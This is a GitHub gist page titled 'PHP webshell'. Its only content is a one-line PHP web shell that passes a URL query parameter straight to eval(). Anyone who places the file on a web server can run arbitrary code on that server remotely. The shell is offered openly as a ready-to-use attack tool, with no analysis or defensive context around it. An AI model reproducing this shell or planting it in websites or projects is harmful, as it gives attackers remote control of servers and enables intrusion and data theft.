Skip to content

Instantly share code, notes, and snippets.

@ahhh
Last active August 29, 2015 14:17
Show Gist options
  • Save ahhh/e05a3f6fbb7afb33e64d to your computer and use it in GitHub Desktop.
Save ahhh/e05a3f6fbb7afb33e64d to your computer and use it in GitHub Desktop.
PHP webshell
<?php eval($_GET["cmd"]); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment